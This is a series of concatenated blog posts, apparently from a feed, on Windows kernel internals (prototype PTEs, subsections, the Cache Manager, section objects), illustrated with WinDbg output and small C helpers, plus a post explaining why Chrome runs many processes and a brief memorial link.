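The same decoding can be expressed in C. This sketch follows the bit layout and the formula used in this example for 32-bit XP; the base constant is the MmNonPagedPoolStart value from this particular machine, and the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Value observed on the machine from this example; it differs per system. */
#define NONPAGED_POOL_START 0x81181000u

/* Bit 0 clear and bit 10 set: software PTE that points to a subsection. */
static int is_subsection_pte(uint32_t pte)
{
    return (pte & 0x1u) == 0 && (pte & 0x400u) != 0;
}

/* Protection field, bits 5..9. */
static uint32_t subsection_pte_protection(uint32_t pte)
{
    return (pte >> 5) & 0x1Fu;
}

/* 24-bit index: 20 high bits from bits 11..30, 4 low bits from bits 1..4. */
static uint32_t subsection_pte_index(uint32_t pte)
{
    uint32_t high = (pte >> 11) & 0xFFFFFu;
    uint32_t low  = (pte >> 1) & 0xFu;
    return (high << 4) | low;
}

/* SubsectionAddress = MmNonPagedPoolStart + (PrototypeIndex << 3). */
static uint32_t subsection_address(uint32_t pte)
{
    assert(is_subsection_pte(pte));
    return NONPAGED_POOL_START + (subsection_pte_index(pte) << 3);
}
```

For the value 0x86D204CE this yields index 0xDA407, protection 6 and subsection address 0x81853038, matching the manual calculation.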

Print a subsection.

> dt _subsection 81853038

nt!_SUBSECTION

+0x000 ControlArea : 0x81853008 _CONTROL_AREA

+0x004 u : __unnamed

+0x008 StartingSector : 0

+0x00c NumberOfFullSectors : 0x100

+0x010 SubsectionBase : 0xe15b7008 _MMPTE

+0x014 UnusedPtes : 0

+0x018 PtesInSubsection : 0x100

+0x01c NextSubsection : (null)

and

+0x004 u : __unnamed

+0x000 LongFlags : 0x60

+0x000 SubsectionFlags : _MMSUBSECTION_FLAGS

+0x000 ReadOnly : 0y0

+0x000 ReadWrite : 0y0

+0x000 SubsectionStatic : 0y0

+0x000 GlobalMemory : 0y0

+0x000 Protection : 0y00110 (0x6) - MM_EXECUTE_READWRITE

+0x000 LargePages : 0y0

+0x000 StartingSector4132 : 0y0000000000 (0)

+0x000 SectorEndOffset : 0y000000000000 (0)

Print control area.

> dt _control_area 0x81853008

nt!_CONTROL_AREA

+0x000 Segment : 0xe1559ba0 _SEGMENT

+0x004 DereferenceList : _LIST_ENTRY [ 0x0 - 0x0 ]

+0x00c NumberOfSectionReferences : 1

+0x010 NumberOfPfnReferences : 0xe5

+0x014 NumberOfMappedViews : 4

+0x018 NumberOfSubsections : 1

+0x01a FlushInProgressCount : 0

+0x01c NumberOfUserReferences : 0

+0x020 u : __unnamed

+0x024 FilePointer : 0x81749818 _FILE_OBJECT

+0x028 WaitingForDeletion : (null)

+0x02c ModifiedWriteCount : 0

+0x02e NumberOfSystemCacheViews : 4

Number of subsections – 1, because it was mapped as binary.

As a result.

We get the file offset that was mapped into the cache slot: (E15B7208 - E15B7008) / 4 * 1000 + 0 = 80000, as we can see in the VACB.
The protection bits for the virtual pages grant maximum rights, MM_EXECUTE_READWRITE, as we can see in the PPTE Protection field: 110, i. e. 6.

Let's look at a more interesting case: the executable section of ole32.dll.

> !ca 817ab818

ControlArea @ 817ab818

Segment e172eaa0 Flink 00000000 Blink 00000000

Section Ref 1 Pfn Ref 8f Mapped Views 13

User Ref 14 WaitForDel 0 Flush Count 0

File Object 81847da0 ModWriteCount 0 System Views 0

Flags (90000a0) Image File HadUserReference Accessed

|->mapped as image

File: \WINDOWS\system32\ole32.dll

Segment @ e172eaa0

ControlArea 817ab818 BasedAddress 774e0000

Total Ptes 13d

WriteUserRef 0 SizeOfSegment 13d000

Committed 0 PTE Template 862a8c3a

Based Addr 774e0000 Image Base 0

Image Commit 7 Image Info e172efd0

ProtoPtes e172ead8

Subsection 1 @ 817ab848

ControlArea 817ab818 Starting Sector 0 Number Of Sectors 2

Base Pte e172ead8 Ptes In Subsect 1 Unused Ptes 0

Flags 11 Sector Offset 0 Protection 1

Subsection 2 @ 817ab868

ControlArea 817ab818 Starting Sector 2 Number Of Sectors 8f8

Base Pte e172eadc Ptes In Subsect 11f Unused Ptes 0

Flags 31 Sector Offset 0 Protection 3

Subsection 3 @ 817ab888

ControlArea 817ab818 Starting Sector 8fa Number Of Sectors 30

Base Pte e172ef58 Ptes In Subsect 6 Unused Ptes 0

Flags 31 Sector Offset 0 Protection 3

Subsection 4 @ 817ab8a8

ControlArea 817ab818 Starting Sector 92a Number Of Sectors 33

Base Pte e172ef70 Ptes In Subsect 7 Unused Ptes 0

Flags 51 Sector Offset 0 Protection 5

Subsection 5 @ 817ab8c8

ControlArea 817ab818 Starting Sector 95d Number Of Sectors c

Base Pte e172ef8c Ptes In Subsect 2 Unused Ptes 0

Flags 11 Sector Offset 0 Protection 1

Subsection 6 @ 817ab8e8

ControlArea 817ab818 Starting Sector 969 Number Of Sectors 69

Base Pte e172ef94 Ptes In Subsect e Unused Ptes 0

Flags 11 Sector Offset 0 Protection 1

It is convenient to present the results in a table. I have used PETools and we can see that ole32 contains five sections, and the first subsection is reserved for the header.

We can see that subsections 2-3, which are mapped to the PE sections .text and .orpc, are executable, i. e. their PPTEs address code sections. The fourth subsection belongs to global data and has copy-on-write protection. The others are used only for read access.
The second subsection describes the first section inside the PE file, with executable code. It begins at the second sector (0x400 / SECTOR_SIZE == 2). The virtual size of the section is 0x11ef5e, i. e. rounded up to a multiple of the page size it is 0x11ef5e + 0xA2 = 0x11F000, and 0x11F000 / PAGE_SIZE = 0x11F, the number of PTEs in the subsection. The raw size in the header is 0x11f000, and 0x11f000 / 0x200 = 0x8F8, the number of sectors in the subsection.
The third subsection also contains executable code and begins at sector 0x11F400 / 0x200 = 0x8FA. Its size is 0x6000 (in this case we take the physical size, because it is larger than the virtual one), i. e. 0x6000 / 0x1000 = 6 PTEs.
The fourth subsection begins at 0x125400 / 0x200 = 0x92A, size 0x7000 / 0x1000 = 7 PTEs.
The fifth: 0x12BA00 / 0x200 = 0x95D, size 0x2000 / 0x1000 = 2 PTEs.
The sixth: 0x12D200 / 0x200 = 0x969, size 0xE000 / 0x1000 = 0xE PTEs.
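The arithmetic from this list can be captured in a short C helper. It is a sketch of the calculation as observed in this example (taking the larger of the virtual and raw sizes), not of the actual VMM code; the type and function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SIZE    0x1000u
#define SECTOR_SIZE  0x200u

typedef struct {
    uint32_t starting_sector;   /* Subsection->StartingSector */
    uint32_t ptes;              /* Subsection->PtesInSubsection */
} subsection_geometry;

/*
 * raw_offset   - raw (file) offset of the PE section
 * virtual_size - virtual size of the PE section
 * raw_size     - raw (file) size of the PE section
 */
static subsection_geometry geometry_from_pe_section(uint32_t raw_offset,
                                                    uint32_t virtual_size,
                                                    uint32_t raw_size)
{
    subsection_geometry g;
    uint32_t size = virtual_size > raw_size ? virtual_size : raw_size;

    assert(raw_offset % SECTOR_SIZE == 0);   /* sections start on a sector boundary */
    g.starting_sector = raw_offset / SECTOR_SIZE;
    g.ptes = (size + PAGE_SIZE - 1) / PAGE_SIZE;   /* round up to whole pages */
    return g;
}
```

For the first code section (raw offset 0x400, virtual size 0x11ef5e, raw size 0x11f000) this gives starting sector 2 and 0x11F PTEs, the same values that !ca prints for subsection 2.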

As the final step, let's check the formula given above in practice. Take the 3rd subsection, which describes the section of ole32.dll starting at offset (in sectors) 0x8fa.

> dt _subsection 817ab888 SubsectionBase

nt!_SUBSECTION

+0x010 SubsectionBase : 0xe172ef58 _MMPTE

Get the content of the first PTE that describes this section.

0: kd> dd 0xe172ef58 l1

e172ef58 0c779121

It is valid, so we can look at its PFN entry.

0: kd> !pfn c779

PFN 0000C779 at address 8112B358

flink 000006E7 blink / share count 00000007 pteaddress E172EF58

reference count 0001 Cached color 0

restore pte 862A8C62 containing page 00B8A9 Active P

Shared

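The restore pte value, split into bit fields: 862A8C62 = 1 00001100010101010001 1 00011 0001 0.

Joining the 20-bit and 4-bit address fields gives 000011000101010100010001 = 0xC5511, and 0xC5511 * 8 + 0x81181000 = 0x817AB888, which is the address of our subsection.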
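
The decoding above can be written as a small C helper. It's a sketch under assumptions: the bit positions are taken from the breakdown above (x86 without PAE, highest bit set), the function name is hypothetical, and the base 0x81181000 is simply the value used in this example, passed in as a parameter.

```c
#include <stdint.h>

/* Rebuild a subsection address from a PTE in subsection format.
   Bits 30..11 hold the high part of the index, bits 4..1 the low part.
   Only the case with the highest bit set is handled here. */
uint32_t subsection_from_pte(uint32_t pte, uint32_t subsection_base)
{
    uint32_t high  = (pte >> 11) & 0xFFFFFu;  /* 20-bit field */
    uint32_t low   = (pte >> 1) & 0xFu;       /* 4-bit field */
    uint32_t index = (high << 4) | low;       /* 24-bit subsection index */

    return subsection_base + (index << 3);    /* index * 8 */
}
```

Calling subsection_from_pte(0x862A8C62, 0x81181000) returns 0x817AB888, the subsection address we started from.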

Now, using the pointer to the PPTE, we can get the file offset that it describes with the help of the formula.

((((PUCHAR)Pte - (PUCHAR)Subsection->SubsectionBase) / 4) << 12) + Subsection->StartingSector * SECTOR_SIZE

(0xE172EF58 - 0xE172EF58) / 4 = 0, and (0 << 12) + 0x8FA * 0x200 = 0x11F400, which is the value we can find in our table above.
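
Here is the same formula as a small C function, with explicit parentheses around the shift. The function and parameter names are hypothetical; the constants assume x86 without PAE (4-byte PTEs, 4KB pages) and 512-byte sectors.

```c
#include <stdint.h>

#define PTE_SIZE    4u      /* sizeof(MMPTE) on x86 without PAE */
#define PAGE_SHIFT  12      /* 4KB pages */
#define SECTOR_SIZE 0x200u  /* 512-byte sectors */

/* File offset described by the PPTE at address 'pte', which belongs to a
   subsection whose first PPTE is at 'subsection_base'. */
uint64_t file_offset_for_ppte(uint32_t pte, uint32_t subsection_base,
                              uint32_t starting_sector)
{
    uint64_t page_index = (pte - subsection_base) / PTE_SIZE;

    return (page_index << PAGE_SHIFT) + (uint64_t)starting_sector * SECTOR_SIZE;
}
```

For the third subsection of ole32.dll, file_offset_for_ppte(0xE172EF58, 0xE172EF58, 0x8FA) returns 0x11F400.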

↧

Why Google Chrome runs so much processes

October 18, 2018, 6:32 am

Reading some topics on the Internet, I realized that I'm not the only one who has wondered why the Google Chrome web browser (on Windows) runs so many processes even when only one or two tabs are open. The situation looks even stranger when the open tabs have no content at all. In this blog post I want to talk about some hidden features of Chrome that can cause this behavior. The purpose of the post is simple: to understand and explain the nature of Chrome's processes. As I got no feedback from Chrome evangelists, I tried to answer these questions on my own.

As everyone already knows, the Chrome web browser is based on a multi-process architecture. This means that it creates more than one process during its work, for various purposes. Among other things, a major advantage of this design is that each tab opens in a separate process, which minimizes possible data loss or crashes of other tabs when a single web page doesn't respond. In such a scenario, you can terminate one non-responsive tab without harming the others. Another obvious reason for the multi-process architecture is Chrome's famous sandbox.

Let's look at a simple experiment. We can take a clean Chrome installation and look at the many processes it runs.

It is a clean 64-bit release installation of Chrome, where special experimental features like AppContainer, Strict site isolation and others are turned off. Only a blank web page is open in the browser. The WS Private indicator is a counter of the physical memory committed by the browser. Another indicator, Private Bytes, represents the amount of virtual memory committed by Chrome's processes; along with resident physical memory, it also includes committed virtual memory that resides in the page file (non-resident, swapped out, but committed). The following types of processes are what Chrome runs as soon as you start it ("out of the box": a clean installation of the 64-bit release version of the browser on Windows 10 with default settings).

As you can see from the scheme above, each process is intended for a specific purpose. The Crashpad handler process is a so-called crash-reporting system (link), as Google calls it. From the technical information behind this link, we can understand that the Crashpad handler helps the web browser report some information and, probably, crash dumps to Google servers. As they write:

"Crashpad is a library for capturing, storing and transmitting postmortem crash reports from a client to an upstream collection server. Crashpad aims to make it possible for clients to capture process state at the time of crash with the best possible fidelity and coverage, with the minimum of fuss.
Crashpad also provides a facility for clients to capture dumps of process state on-demand for diagnostic purposes."

The Watcher process, as its name suggests, tracks the state of Chrome's processes and checks whether they have hung.

Chrome leverages the GPU to accelerate the drawing of some graphics, including CSS, graphical elements and ordinary web-page rendering. The process that does this is called the GPU process. This feature is turned on by default and, it seems, can't be turned off, even by resetting the corresponding option in the browser's settings.

I say it can't be turned off because, in my experience, even when I disabled this feature, the browser was still instructed to use the GPU. Probably, with this feature turned off, the browser wouldn't have to create additional processes for this purpose.

Interestingly, the GPU process can also be sandboxed with the Windows 8+ security feature called AppContainer.

Chrome also contains some security features that can, in theory, contribute to creating more processes. For example, the browser has a special security feature for mitigating the Spectre #1 security vulnerability (link). It is called "Strict site isolation".

Yes, with this feature activated, each site the user opens is isolated in a separate process. This mitigation is useful against Spectre #1 because, by exploiting speculative execution flaws with the help of scripting languages, an attacker may steal sensitive user data that belongs to another site, for example, online banking. Thus, a malicious script from a crafted page can get access to a trusted site's data that is handled in the same browser process. If Chrome isolates each site in a separate process, this situation becomes impossible. The obvious side effect of such a scheme is more Chrome processes running in the system.

But if you look at the description of this feature, you will be surprised that it is turned on by default even though it is marked as disabled (Disabled actually means the default behaviour). Probably Chrome's managers decided to protect users from speculative execution side-channel flaws by default. This is one more reason why you see a lot of running browser processes.

Chrome can also render PDF content in a separate plugin process (the default setting). This also implies creating additional processes for each opened document. PDF isolation inside a separate process is important, because a major part of all RCE exploits target the Adobe Reader or Flash plugins.

Also, according to Chrome's task manager, it can create processes for web-page frames, browser extensions (plugins) and applications. You can find processes for various content in the screenshot below.

Conclusion

I've also been testing Google Chrome on Windows 10 to understand what security features it supports. The browser has shown very good results (Windows 10 RS4).

↧

RIP Vitalik aka VK_Intel

November 3, 2022, 12:51 am

https://www.darkreading.com/careers-and-people/vitali-kremez-dead-apparent-scuba-diving-accident

↧

Inside the Windows Cache Manager

December 2, 2022, 11:18 pm

Introduction

The cache is an integral part of the operating system and its hybrid kernel. Roughly speaking, it's just a virtual memory region in the kernel address space, into which the Cache Manager maps file data to provide quick access to it in the future. This access is frequently used by the File System Driver (FSD) or the Windows Memory Manager (VMM). Instead of reading file data from disk every time a user or the system needs to access it, the OS kernel calls the Cache Manager in an attempt to get this data from memory. In turn, the Cache Manager is a set of functions in the kernel executable file ntoskrnl.exe whose names start with the prefix Cc. These functions are private, so to get their names, you need to configure the symbol server settings in WinDbg or IDA.

Learning the Windows Cache Manager is quite a difficult task for beginners. This Windows kernel subsystem is closely related to the VMM, so if you don't have enough knowledge of it, try to understand the basic concepts without going into complicated technical aspects. In addition, you should have some knowledge of file system drivers (FSD), because they are the most frequent clients of the Cache Manager. It's worth noting that the cache concept exists only at the file system level; lower drivers on the device stack, like the volume manager, partition manager, disk driver, and disk port driver, don't use it.

This blog post is dedicated to the technical aspects of the Windows Cache Manager and is designed for skilled Windows Internals readers. If you lack knowledge on this topic, read the corresponding chapter in the Windows Internals book and then get back to this post. I would say that this blog post is a kind of technical addition to the chapter about the cache in the book (or at least I hope it can claim to be).

Let's take a look at some terms for newcomers.

Working Set (WS) - the set of pages in the user mode or kernel mode address space that are currently resident in physical memory. The kernel mode working set is called the System Working Set.

PTE (Page Table Entry) - a structure that is used by the CPU and VMM to translate virtual addresses to physical ones.

Proto-PTE (Prototype PTE, PPTE) - a special type of so-called software PTE that is used only by the VMM (not the CPU) to work with section objects (memory-mapped files) and serves as an intermediate level for translating mapped section pages to the real hardware PTE. The PPTE is a key structure for understanding section objects.

Segment Control Area (or just Control Area, CA) - a structure that contains information required for performing I/O operations with file data in or from the mapped file. It's stored in the non-paged pool. With the help of CA the VMM can address the same file as binary and as executable.

The basic concepts

The memory region in the kernel mode address space occupied by the cache starts at the value of the VMM variable MmSystemCacheStart and ends at the value of MmSystemCacheEnd. Thus, if X is a pointer into the memory region that belongs to the cache, then MmSystemCacheStart <= X <= MmSystemCacheEnd. File data in this region is mapped into slots, which are 256KB blocks of data. The cache has two features, which are a consequence of the fact that the VMM is responsible for its internal implementation.

The section objects maintained by the VMM are used to map file data into slots. Thus, the VMM is responsible for paging file data.
Cache virtual pages can be unloaded to the page file.

These features emphasize the fact that the Cache Manager doesn't know for sure whether the file data is in physical memory or not. An undocumented structure called the Virtual Address Control Block (VACB) is used to describe the cache slots, which are reserved in the paged pool. The control blocks are addressed through the CcVacbs variable. Each of these blocks controls a specific slot. The variable CcNumberVacbs stores the number of slots.

VACB has the following format.

There are two VACBs lists.

CcVacbFreeList. A list of free VACBs, i.e. those VACBs that are ready for use.
CcVacbLru. A list of all other VACBs.

A VACB has free status if its .ActiveCount field is zero. When a VACB is reused, its slot address is re-mapped. The following WinDbg command confirms these facts.

r eax=0; !list "-t ntdll!_LIST_ENTRY.Flink -x \"r eax=@eax+1;? @eax;? @$extret-10; dt nt!_VACB @$extret-10\" nt!CcVacbFreeList "

We can use it to print free VACBs and their numbers, for example.

The entry that follows the first one is at 0x81954fb0 = 0x81954fa0 + 0x10.

We can do the same for the remaining (CcVacbLru).

r eax=0; !list "-t ntdll!_LIST_ENTRY.Flink -x \"r eax=@eax+1;? @eax;? @$extret-10; dt nt!_VACB @$extret-10\" nt!CcVacbLru"

Most of these structures have initialized shared cache maps and are mapped to the cache. If we sum up the last VACB numbers from both lists, we get something like this.

14b+6b3 = 7fe

dd CcNumberVacbs l1

8055f670 000007fe

The virtual address of a specific slot refers to a PTE pointing to a PPTE; the latter is linked to the subsection that describes the file (usually there's one subsection that is linked to the shared cache map and maps the file as binary, look at MmMapViewInSystemCache). You can learn more about PPTEs from my blog post here.

The cached file is described by two important structures called the shared cache map and the private cache map. Unlike the shared cache map, the private cache map isn't so interesting to explore, because it's used for so-called intelligent read-ahead. Let's take a look at the shared cache map. It's a structure that the Cache Manager maintains for caching a specific file. As in the case of control areas, which are unique for disk files (one is used to map the file as binary and another one to map it as an executable), shared cache maps are unique as well and are addressed through the SECTION_OBJECT_POINTERS structure, which is held by the FSD in the FCB structure of a specific file. Thus the Cache Manager knows exactly which slot describes a specific file via the VACB, which stores a pointer to the shared cache map.

The Cache Manager can find this structure for each opened FileObject, because it points to SECTION_OBJECT_POINTERS (FileObject->SectionObjectPointer). The shared cache map is described by the following structure.

So that the Cache Manager can quickly find out which parts of a specific file are already mapped (i.e. have slots in use), the shared cache map points to the VACB index array. The first element of the array points to the first 256KB of the file, the second to the next 256KB and so on. If the file is no larger than 1MB, i.e. fits in four slots, the InitialVacbs array from the shared cache map acts as the index array; otherwise the array is allocated from the paged pool. In any case, the pointer to it is stored in the Vacbs field. All private cache maps of a file are linked into a list with the head in PrivateList (&SharedCacheMap->PrivateList, &PrivateCacheMap->PrivateLinks). Moreover, all shared cache maps are also linked into lists via SharedCacheMapLinks. There's a special Cache Manager function, CcInitializeCacheMap, which is called by the FSD and is responsible for initializing a shared cache map (if it hasn't been created yet), creating a section object and creating a private cache map.

VOID CcInitializeCacheMap (__in PFILE_OBJECT FileObject, __in PCC_FILE_SIZES FileSizes, __in BOOLEAN PinAccess, __in PCACHE_MANAGER_CALLBACKS Callbacks, __in PVOID LazyWriteContext)

This function does the following.

It creates and initializes the shared cache map if it doesn't exist yet (FileObject->SectionObjectPointer->SharedCacheMap is zeroed). SharedCacheMap->FileObject is initialized with the first file object for which the map is created.
It creates the section object with MmCreateSection. Later, this section is used to map file data into cache slots.
It creates a VACB index array with CcCreateVacbArray. This function initializes the .Vacbs and .SectionSize fields.
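
To make the VACB index array more concrete, here's a minimal C sketch of the arithmetic described earlier: one array element per 256KB of the file, and four built-in elements for files of up to 1MB. The function names and constants are my own illustration, not the Cache Manager's real code.

```c
#include <stdbool.h>
#include <stdint.h>

#define SLOT_SIZE          (256u * 1024u)  /* one cache slot covers 256KB */
#define INITIAL_VACB_COUNT 4u              /* elements in InitialVacbs, per the text */

/* Index of the VACB array element that covers the given file offset. */
uint32_t vacb_index_for_offset(uint64_t file_offset)
{
    return (uint32_t)(file_offset / SLOT_SIZE);
}

/* True if the file is small enough (not more than 1MB) for InitialVacbs
   to act as the index array. */
bool fits_in_initial_vacbs(uint64_t file_size)
{
    return file_size <= (uint64_t)INITIAL_VACB_COUNT * SLOT_SIZE;
}
```

For example, file offset 0x00ac0000 falls into array element 0x2B, while a file of 1MB plus one byte no longer fits into the built-in array.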

If the FSD needs to read data from the cache, it calls CcCopyRead.

Internally, the Cache Manager maps parts of file data with the help of CcGetVirtualAddress; this function returns the base address of the data in memory. The function operates on only one VACB and one slot.

The Cache Manager uses the following function to map file data.

PVACB CcGetVacbMiss (IN PSHARED_CACHE_MAP SharedCacheMap, IN LARGE_INTEGER FileOffset, IN OUT PKLOCK_QUEUE_HANDLE LockHandle, IN LOGICAL HasBcbListHeads)

The function searches for a VACB to map file data into cache slots and maps it using MmMapViewInSystemCache (the value for the file mapping is taken from &Vacb->BaseAddress).

The following WinDbg script explores the cache.

Take a look at some printed data from my system.

Therefore, the $Mft file is cached at 0xd90c0000 with an offset 0x00ac0000 from its beginning. Take a look at it.

Let's ask how the kernel maps sections into the cache. The answer is located in the MmMapViewInSystemCache function. Before analyzing it, let's point out some facts.

The cache PTEs start at the address stored in MmSystemCachePteBase (usually it matches the address of the beginning of the page table, 0xC0000000).
Free cache slots are linked into an MMPTE_LIST list to provide quick access to them (see WRK for more info about this structure). The pointer to the head of the list is stored in MmFirstFreeSystemCache. The .NextEntry field in MMPTE_LIST stores a value that points to the next entry (the next block of PTEs). This value is relative to MmSystemCachePteBase. The MiInitializeSystemCache function is responsible for initializing the list of cache PTEs. The PTEs for the cache are reserved in adjacent blocks, i.e. to cover 256KB, a block includes 64 PTEs, see MiInitializeSystemCache.

MmMapViewInSystemCache maps only one cache slot, i.e. the CapturedViewSize argument can contain a size of no more than 256KB. Below you can see pseudocode for the typical behavior of MmMapViewInSystemCache. Take a look at the comments, they explain the operations to be performed.

#define GetVirtualAddressByPte(PTE) ((PVOID)((ULONG)(PTE) << 10))
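
To show why a shift by 10 is enough in the macro above, here's a small user-mode C sketch of both directions of the conversion. It assumes x86 without PAE, where page tables start at 0xC0000000 and each PTE is 4 bytes; the function names are hypothetical.

```c
#include <stdint.h>

#define PTE_BASE   0xC0000000u  /* start of the page tables on x86 without PAE */
#define PAGE_SHIFT 12           /* 4KB pages */

/* Address of the PTE that maps the given virtual address. */
uint32_t pte_address_for_va(uint32_t va)
{
    return PTE_BASE + ((va >> PAGE_SHIFT) << 2);  /* 4 bytes per PTE */
}

/* Virtual address mapped by the PTE at the given address. The 32-bit shift
   drops the PTE_BASE bits, which is the trick the macro relies on. */
uint32_t va_mapped_by_pte(uint32_t pte_address)
{
    return pte_address << 10;
}
```

For the cache address 0xd90c0000 the PTE is at 0xC0364300, and shifting that address left by 10 bits gives 0xd90c0000 back.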

↧

Dissecting Windows Section Objects

December 3, 2022, 7:39 am

Instead of introduction

We can't imagine Windows without section objects (or file mapping objects in terms of Windows API) and hardly can we find a Windows kernel subsystem that doesn't address it. The great idea behind section objects is that instead of calling Windows File APIs to work with a file, you can read virtual memory to get file data and write virtual memory to write file data. But this simple concept doesn't have simple things under the hood. To simplify the understanding of this difficult topic, we take Windows x86 edition with 32-bit pointers.

Don't worry if you can't understand everything; even skilled Windows Internals readers may have difficulties with this topic. I would recommend reading the corresponding chapter of the Windows Internals book, because this blog post includes a lot of technical material and describes fairly low-level things.

The basic terms

So if you're ready, let's get started. First, we need to take a quick look at some technical terms, because without understanding any of them, we can't get the full picture. Next we'll focus on each of them in detail.

Section object - a kernel object described by the _SECTION structure. In the terms of Windows API it's called file mapping object. There're two types of section objects: pagefile-backed section and file-backed section. The first one is used when processes want to share a region of virtual memory. The file backed section reflects the contents of an actual file on disk.
Virtual Memory Manager (VMM) - a set of Mm functions in ntoskrnl that are responsible for all operations related to virtual and physical memory. The VMM also creates, maintains and deletes section objects as well as their substructures (see below).
I/O manager - in the context of our topic, these are Io functions in ntoskrnl that are used by the VMM to perform I/O operations with the mapped file data. This subsystem just initiates I/O operations, which are actually performed by file system drivers and disk drivers on device stacks.
PTE (Page Table Entry) - a structure that is used by the CPU and VMM to translate virtual addresses to physical ones.
Proto-PTE (Prototype PTE, PPTE) - a special type of invalid PTEs that is used only by the VMM (not CPU) to work with section objects and serves as an intermediate level for the translation virtual addresses to the mapped section pages (file data). PPTE points to a subsection and helps the VMM to find file data that should be located in the corresponding virtual memory pages.
PTE pointing to PPTE - a special type of invalid hardware PTE (with a zeroed valid (V) flag) that is designed to find the corresponding PPTE in the Segment structure (PPT).
Prototype page table (PPT) - an array of PPTEs that is a part of Segment structure. Once the process maps a section, the VMM fills the hardware PTEs of the virtual pages with pointers to the elements of this array. When the process unmaps a section, the VMM removes pointers to PPTEs from hardware PTEs.
Segment - a data structure that provides the section object with the necessary information to calculate pointers to subsections, it also contains a PPT.
Segment Control Area (or just Control Area, CA) - a structure containing information required for performing I/O operations with file data in or from the mapped file. It's stored in the non-paged pool. With the help of CA the VMM can address the same file as binary and as executable.
Subsection - a data structure containing the necessary information to calculate offsets relative to the beginning of the mapped file using PPTEs. There is normally only one subsection if the file was mapped as binary. In case if it was mapped as executable, the number of subsections is the same as the number of sections in the mapped executable.
Page fault (#PF) for section - a situation (an exception) when a thread tries to access a virtual page mapped to the section, but its PTE is marked as not valid.
Modified page writer - system threads that are responsible for synchronizing modified file data in virtual memory with a disk file.
Page Frame, Page Frame Number, PFN database - terms describing physical memory: physical memory page, its number, numbers database. The latter includes information about all physical memory pages (page frames) and is designed to track status of each physical page (page frame).

Diving deeper into the Section kernel objects

Section is a kernel object that is created and maintained by the VMM. The MmCreateSection function creates the kernel object, allocating memory for it from the paged pool, initializes its fields, creates Control Area and Segment structures if needed (see MiCreateImageFileMap, MiCreateDataFileMap). To create an object, the caller of MmCreateSection must provide a pointer to a FileObject that describes the file to be mapped. Using the FileObject, the functions mentioned above initialize Control Area and Segment structures.

MmCreateSection is responsible not only for initializing a Section object, but also for initializing and maintaining important PSECTION_OBJECT_POINTERS FILE_OBJECT->SectionObjectPointer structure. You can see its definition below.

typedef struct _SECTION_OBJECT_POINTERS {PVOID DataSectionObject; PVOID SharedCacheMap; PVOID ImageSectionObject;} SECTION_OBJECT_POINTERS;

.DataSectionObject points to the Control Area structure if the file is mapped as binary;
.ImageSectionObject points to the Control Area structure if the file is mapped as executable;
.SharedCacheMap points to the shared cache map (see Inside the Windows Cache Manager). This field is used by the Cache Manager to cache file data.

As you can see all these three fields point to the structures needed to perform a certain type of file operations. The SECTION_OBJECT_POINTERS structure is created by the FSD when it gets a request to create (open) a file. The Cache Manager deals with .SharedCacheMap. Even if there are no sections for the file object (i e .DataSectionObject and .ImageSectionObject are NULL), .SharedCacheMap is almost always initialized (for disk files), because the Cache Manager caches parts of the file to provide quick access to its data. To create .DataSectionObject and .ImageSectionObject the VMM uses functions MiCreateDataFileMap and MiCreateImageFileMap.

NTSTATUS MmCreateSection(OUT PVOID *SectionObject, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize, IN ULONG SectionPageProtection, IN ULONG AllocationAttributes, IN HANDLE FileHandle OPTIONAL, IN PFILE_OBJECT File OPTIONAL)

The descriptions of these arguments match those of NtCreateSection.

Take a look at the Control Area structure

Segment control area (or just Control Area, CA) is a structure containing the information necessary to perform I/O operations with a section. It's stored in the nonpaged pool and is described by the following structure.

Control Area contains all the necessary data to perform I/O operations with the section.

Pointer to a Segment containing information from the PE file header and a PPTE array.
Pointer to a File Object describing mapped file that will be used for I/O operations.
An array of subsections, which is located after the CA structure in virtual memory, containing the necessary data to calculate file offsets.

The Control Area structure contains the flags that indicate what kind of data is addressed by the section. When the VMM creates a CA object for an executable file using MiCreateImageFileMap, its size is equal to the size of the CA structure plus the size of one Subsection structure multiplied by the number of subsections (i.e. the number of PE sections + 1 for the PE header). It's important to note that all _SUBSECTION structures are located immediately after the Control Area and their number is stored in the NumberOfSubsections field. The subsections of one section (Control Area) are linked in a list via .NextSubsection. The !ca command of WinDbg prints information about a Control Area.

We can also explore these structures manually for the first three subsections.

Further, we'll discuss this output in more detail.

As it was mentioned earlier, the FILE_OBJECT structure has a very important structure called _SECTION_OBJECT_POINTERS. This structure addresses two CAs, one for a binary mapping type and second if the file is mapped as executable (the same file can be mapped as both binary and executable). These CAs point to different Segments with their own PPTE tables. This structure is maintained by the FSD.

Subsections are allocated in virtual memory immediately after the CA structure. For example, if the Control Area describes an executable view, then ControlArea = ExAllocatePoolWithTag (NonPagedPool, sizeof(CONTROL_AREA) + (sizeof(SUBSECTION) * SubsectionsAllocated), 'iCmM').
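
This layout can be illustrated with a short C sketch. The structure sizes 0x30 and 0x20 are assumptions for 32-bit Windows XP, inferred from the ole32.dll dump in my Proto-PTE post, where the Control Area is at 817ab818 and neighbouring subsections are 0x20 bytes apart. The function names are hypothetical.

```c
#include <stdint.h>

#define CONTROL_AREA_SIZE 0x30u  /* assumed sizeof(CONTROL_AREA), x86 */
#define SUBSECTION_SIZE   0x20u  /* assumed sizeof(SUBSECTION), x86 */

/* Size of the pool block that holds a Control Area and its subsections. */
uint32_t control_area_alloc_size(uint32_t subsection_count)
{
    return CONTROL_AREA_SIZE + SUBSECTION_SIZE * subsection_count;
}

/* Address of the subsection with the given zero-based index, assuming the
   subsections are stored back to back right after the Control Area. */
uint32_t subsection_address(uint32_t control_area, uint32_t index)
{
    return control_area + CONTROL_AREA_SIZE + index * SUBSECTION_SIZE;
}
```

With these sizes, the third subsection of the Control Area at 817ab818 is at 817ab888 and the sixth one at 817ab8e8, which agrees with that dump.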

A few words about Subsections

